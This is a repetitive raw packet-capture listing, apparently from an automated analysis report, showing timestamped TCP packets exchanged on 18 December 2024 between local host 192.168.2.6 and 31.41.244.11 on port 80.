                                                                                                                                                                  Dec 18, 2024 11:09:26.842325926 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.843041897 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.843206882 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.843240023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.843287945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.844017029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.844088078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.844118118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.844422102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.844968081 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.845033884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.845120907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.845297098 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.845946074 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.846014023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.846040964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.846132994 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.846921921 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.846976995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.847004890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.847098112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.847928047 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.847974062 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.848071098 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.848113060 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.849073887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.849087954 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.849137068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.849137068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.849881887 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.849930048 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.850009918 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.850202084 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.850861073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.850967884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.851007938 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.851008892 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.851844072 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.851890087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.851934910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.851977110 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.852828026 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.852932930 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.852936029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.853111029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.853797913 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.853851080 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.853885889 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.853928089 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.854784966 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.854832888 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.854984045 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.855027914 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.855787039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.855879068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.855915070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.856005907 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.856698036 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.856832027 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.997431040 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.997450113 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.997534990 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.997714996 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.997761011 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.997896910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.997934103 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.998868942 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.998883963 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:26.998929024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.998929024 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:26.999883890 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.000000954 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.000034094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.000075102 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.000524044 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.000535965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.001661062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.001698971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.001698971 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.001847029 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.001888037 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.002609968 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.002645016 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.002950907 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.002986908 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.003690958 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.003853083 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.003886938 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.003886938 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.004770041 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.004911900 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.004944086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.004944086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.005613089 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.005656004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.005805016 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.005968094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.005979061 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.006000996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.006000996 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.006016970 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.006656885 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.006700039 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.006747007 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.006783962 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.007642031 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.007680893 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.007742882 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.007781029 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.008632898 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.008672953 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.008730888 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.009613991 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.009655952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.009655952 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.009767056 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.009856939 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.010608912 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.010651112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.010690928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.011595964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.011625051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.011643887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.011643887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.012557030 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.012602091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.012602091 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.012666941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.013551950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.013593912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.013593912 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.013631105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.013669014 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.014560938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.014765024 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.014802933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.014802933 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.015486956 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.015640020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.015675068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.015675068 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.016859055 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.016937971 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.016944885 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.016984940 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.017931938 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.017986059 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.019035101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.019335985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.021151066 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.021164894 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.021198988 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.021209002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.021209002 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.021212101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.021244049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.021244049 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.021475077 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.021486998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.021524906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.021524906 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.022408962 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.022452116 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.022547960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.022608995 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.023334980 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.023426056 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.023472071 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.024260044 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.024605989 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.024617910 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.024701118 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.025247097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.025402069 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.025440931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.025440931 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.026343107 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.026355028 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.026395082 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.027301073 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.027359009 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.027461052 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.027549028 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.028242111 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.028259039 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.028316021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.028316021 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.029154062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.029232025 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.029300928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.029603004 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.030294895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.030318022 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.030375957 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.031176090 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.031233072 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.031451941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.031578064 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.032228947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.032390118 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.032433033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.032433033 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.033154964 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.033307076 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.033330917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.033376932 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.034185886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.034198999 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.034619093 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.035128117 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.035285950 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.035321951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.035321951 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.036099911 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.036233902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.036303997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.036303997 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.037111998 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.037220001 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.037276983 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.037352085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.038024902 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.038079023 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.038187981 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.038805008 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.038991928 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.039122105 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.039136887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.039237976 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.040203094 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.040216923 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.040258884 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.040396929 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.041102886 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.041239023 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.041280985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.041280985 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.041964054 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.042068958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.042124987 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.042619944 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.042875051 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.043029070 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.043066978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.043066978 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.043921947 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.044104099 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.044111967 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.044307947 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.044953108 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.044965982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.045008898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.045008898 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.045830965 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.045878887 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.046099901 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.046998978 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.047043085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.047043085 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.047136068 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.047344923 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.047885895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.048057079 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.048074961 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.048846960 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.048890114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.048890114 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.187578917 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.187717915 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.187742949 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.187789917 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.187967062 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.188076019 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.188123941 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.188189983 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.189095020 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.189198017 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.189224958 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.189266920 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.189994097 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.190119982 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.190140009 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.190197945 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.190902948 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.190960884 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.190990925 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.191092968 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.191893101 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.191994905 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.192017078 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.192058086 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.192864895 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.192984104 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.193025112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.193025112 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.193861008 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.193933010 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.193948984 CET804991231.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:27.194060087 CET4991280192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:27.194833040 CET804991231.41.244.11192.168.2.6
